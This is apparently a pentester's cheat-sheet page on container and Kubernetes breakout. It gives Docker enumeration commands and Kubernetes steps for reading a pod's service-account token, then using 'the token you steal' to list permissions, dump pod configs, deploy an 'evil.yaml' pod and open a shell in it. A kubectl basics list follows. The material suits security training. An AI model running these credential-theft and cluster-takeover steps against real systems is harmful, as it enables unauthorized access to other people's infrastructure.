Container/Sandbox Breakout

Virtual inceptions

Docker

I first check the hosts for any potential cues of containerization and/or any other nodes on the network. You can also try running the binary capsh. If it exists, this can be used to print current container capabilities.

cat /etc/hosts #check for container id leik 8u9ru98432
capsh --print #check current unix capabilites

ls -l /proc/*/ns #list proc

ls -al /dev/ | grep disk #check for disks

Kubernetes

Try getting secrets.

cat /var/run/secrets/kubernetes.io/serviceaccount/token

List what you can do with this token

kubectl --token "$(cat token.txt)" --insecure-skip-tls-verify --server=https://team.thm:6443 auth can-i --list

Get pods & configs

kubectl get pods -o yaml > backup.config \
	--server="https://kube-serv:6443" \
	--token='<Token you steal>' \
	--insecure-skip-tls-verify=true 
kubectl get pods \
	--server="https://kube-serv:6443" \
	--token='<Token you steal>' \
	--insecure-skip-tls-verify=true

Build & Deploy

kubectl  apply -f ./evil.yaml \
	--server="https://kube-server:6443" \
	--token='<token you steal>' \
	--insecure-skip-tls-verify=true

Execute command 

kubectl exec -it attacker \
	--server="https://kube-server:6443" \
	--token='<Token you steal>' \
	--insecure-skip-tls-verify=true \
	-- bash

Basic commands

kubectl version #Get client and server version
kubectl get pod
kubectl get services
kubectl get deployment
kubectl get replicaset
kubectl get secret
kubectl get all
kubectl get ingress
kubectl get endpoints

#kubectl create deployment <deployment-name> --image=<docker image>
kubectl create deployment nginx-deployment --image=nginx
#Access the configuration of the deployment and modify it
#kubectl edit deployment <deployment-name>
kubectl edit deployment nginx-deployment
#Get the logs of the pod for debbugging (the output of the docker container running)
#kubectl logs <replicaset-id/pod-id>
kubectl logs nginx-deployment-84cd76b964
#kubectl describe pod <pod-id>
kubectl describe pod mongo-depl-5fd6b7d4b4-kkt9q
#kubectl exec -it <pod-id> -- bash
kubectl exec -it mongo-depl-5fd6b7d4b4-kkt9q -- bash
#kubectl describe service <service-name>
kubectl describe service mongodb-service
#kubectl delete deployment <deployment-name>
kubectl delete deployment mongo-depl
#Deploy from config file
kubectl apply -f deployment.yml

https://github.com/TurboWindX/kube-hunter

https://github.com/TurboWindX/peirates

PreviousPost ExploitationNextPrivilege Escalation

Last updated